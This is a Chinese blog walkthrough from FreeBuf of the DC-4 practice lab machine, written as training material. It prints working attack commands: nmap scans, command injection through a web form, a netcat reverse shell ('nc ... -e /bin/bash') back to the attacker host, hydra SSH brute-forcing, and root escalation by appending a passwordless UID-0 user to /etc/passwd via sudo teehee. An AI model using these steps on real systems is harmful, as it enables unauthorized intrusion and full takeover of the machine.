freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Vulhub 练习 DC-4靶机完整复现
Koi 2024-03-11 13:12:38 175146

1.工具

kali:攻击机 IP地址:192.168.200.4

DC-4:靶机 IP地址:暂时未知

2.注意

这里搭建环境两台机器应该选用同类的网络连接方式:这里两台的连接方式为模式

二、信息收集

1.主机发现

找寻同网段下存活的主机(可以根据DC-4的MAC地址看扫描出来的IP地址)

arp-scan -l  #第一种方式

1706592913_65b88a913813e9b2dec95.png!small?1706592913890

nmap -sP 192.168.200.0/24 -T4 # 第二种方式

1706592924_65b88a9c52a3eb3c4405b.png!small?1706592924870

2.端口扫描

查看此主机开放了哪些可以利用的端口信息

nmap -sV -p-  192.168.200.9

1706592937_65b88aa948833010fa352.png!small?1706592937787

3.后台目录扫描

1706592944_65b88ab094bd32d6b957f.png!small?1706592944921

4.网站指纹

通过以下两种方式可以准确知道网站的框架信息

①先登录网页,利用火狐插件查看

1706592955_65b88abb1efb99969b728.png!small?1706592955592

利用kali中的指纹识别命令whatweb扫描

1706592962_65b88ac29e151cc615488.png!small?1706592963006

网页提示信息是需要以admin用户进行登录的,那么现在只需要搞到密码就行

1706592970_65b88aca7b0454718df45.png!small?1706592970831

3.爆破密码

①暴力破解

1706592978_65b88ad2e641ba8d8dd69.png!small?1706592979356

得知password:happy

点击对应单选项,然后RUN发现是执行了每种ls指令,用BURP抓包

1706592865_65b88a619554e77caf9f3.png!small?1706592867523



linux中的操作指令

1706592993_65b88ae1a23328c0fda81.png!small?1706592994155

试试其他经典指令,比如whoami、ip addr这种的

看不到明显的信息,倒是可以知道此指令是可以执行的(页面200)

1706593003_65b88aeb228fba19227a8.png!small?1706593003662

还有一种就是在前端代码中寻找RUN时执行的对应指令,修改

尝试修改一下前端指令

1706593013_65b88af51998e238b7a6b.png!small?1706593013671

一样的效果

1706593023_65b88aff7f21470e498ff.png!small?1706593023818

三、反弹shell

1、首先在kali当中,使用nc进行端口监听

nc -lvvp 8899

1706593032_65b88b087c978cf9f3c87.png!small?1706593033269

2、修改命令 ,修改完后点击Go即可

nc 192.168.200.3 8899 -e /bin/bash 
#nc命令使用的是kali渗透机的ip地址,端口号需要和你上方nc监听端口一致

1706593043_65b88b132848d6363c7b4.png!small?1706593043663

3、回到kali,这是低权限用户

1706593051_65b88b1bacefecc020cb2.png!small?1706593052305

4.使用python的交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

方便我们操作,避免因为退出而导致需要重新或许使用nc反弹shell
应该是三个人名:charles jim sam

经查看old-passowrd.bak是一个密码文件,只有jim下有东西,其他的两个目录下都为空

1706593061_65b88b250643adbc8d5be.png!small?1706593061535

这是test.sh中的句子翻译,应该是暴力破解,而密码文件应该就在同级目录的那个文件当中

1706593071_65b88b2f1a10650ab2630.png!small?1706593071425

5、破解jim用户密码

,把old-passowrd.bak复制到kali中,使用hydra进行爆破,

hydra -l jim -P /home/kali/123.txt  ssh://192.168.200.9

需要等几分钟,得到密码

1706593080_65b88b383c39ce1208b2c.png!small?1706593080994

账号:jim

密码:jibr104

[22][ssh] host: 192.168.200.9   login: jim   password: jibril04

6、连接成功

1706593089_65b88b417df183dd8f87b.png!small?1706593090124

1706593097_65b88b498835475b27851.png!small?1706593097886

进入 到邮件目录

cd /var/mail 里

1706593104_65b88b502f8ef7d368a16.png!small?1706593104693

结尾可以看到是charles发来的信息,登录密码:^xHhA&hvim0y,切换登陆看看su charles

一些目录被限制了权限,进行提升权限

1706593111_65b88b576f905597dee92.png!small?1706593111870

权限提升

先用sudo -l看看自己有什么权限

teehee这个用户是不需要用密码登录的。

1706593119_65b88b5f5851ba57be8cd.png!small?1706593119727

四、提权

添加一个无密码用户,并使用teehee执行写入 passwd中

echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息命令解释程序(Shell)


添加一个用户,使用teehee执行写入到/etc/passwd中,加入到root权限组中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

1706593131_65b88b6bb8b50cf5b1d0e.png!small?1706593132309

无密码直接登录账号admin

1706593138_65b88b7240b4849601536.png!small?1706593139722

文章复现参考:https://blog.csdn.net/liver100day/article/details/117707129


# 渗透测试 # web安全 # 漏洞分析
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Koi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
靶机练习
Koi LV.6
每个人都是都是独一无二的个体。
  • 41 文章数
  • 28 关注者
Noob 靶场完整解析
2024-03-23
Al-Web-1.0 靶机 渗透测试
2024-03-20
jangow 靶场完整解析
2024-03-11
文章目录